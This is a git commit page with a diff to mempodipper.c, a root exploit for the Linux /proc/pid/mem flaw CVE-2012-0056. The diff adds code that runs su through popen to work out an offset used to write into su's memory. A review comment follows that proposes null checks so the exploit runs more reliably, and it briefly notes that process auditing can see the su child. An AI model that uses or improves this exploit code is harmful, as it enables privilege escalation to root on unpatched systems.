authorJason A. Donenfeld <Jason@zx2c4.com>2012-01-22 22:02:11 +0100
committerJason A. Donenfeld <Jason@zx2c4.com>2012-01-22 22:02:11 +0100
commit34d603029eb96fde8bc39a6f10ae84115e11008f (patch)
treebd3498411cce9148f6b89ddc887f78d959075326
parentRemove unused code. (diff)
downloadCVE-2012-0056-34d603029eb96fde8bc39a6f10ae84115e11008f.tar.xz
CVE-2012-0056-34d603029eb96fde8bc39a6f10ae84115e11008f.zip
Calculate length of su dynamically.
-rw-r--r--mempodipper.c8
1 files changed, 7 insertions, 1 deletions
diff --git a/mempodipper.c b/mempodipper.c
index 2a80857..64919fa 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -189,7 +189,13 @@ int main(int argc, char **argv)
}
printf("[+] Resolved exit@plt to 0x%lx.\n", address);
}
- unsigned long su_padding = strlen("Unknown id: ");
+ printf("[+] Calculating su padding.\n");
+ FILE *command = popen("su this-user-does-not-exist 2>&1", "r");
+ char result[256];
+ result[0] = 0;
+ fgets(result, 256, command);
+ pclose(command);
+ unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
unsigned long offset = address - su_padding;
printf("[+] Seeking to offset 0x%lx.\n", offset);
lseek64(fd, offset, SEEK_SET);
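Review bot: The added probe uses three results unchecked: `popen` can return NULL (so `fgets` and `pclose` get a null stream), `fgets` can read nothing, and `strstr` returns NULL when the marker is not in the first line of output, which makes the pointer subtraction on the `su_padding` line undefined and leaves the following `lseek64` working from a meaningless offset. The code should stop there instead of continuing: add `if (!command) return 1;` after the `popen`, then `char *hit = strstr(result, "this-user-does-not-exist");` and `if (!hit) return 1;` before computing `su_padding = hit - result`. The `/ sizeof(char)` is a division by one and can be dropped, and `sizeof result` would be safer than repeating the literal `256`. For anyone reading this from the detection side, `popen` runs the command through the shell, so each run spawns `su this-user-does-not-exist` as a child process that process auditing can record. The body of `main` starts and ends outside this hunk, so earlier checks on `fd` and `address` are not visible here.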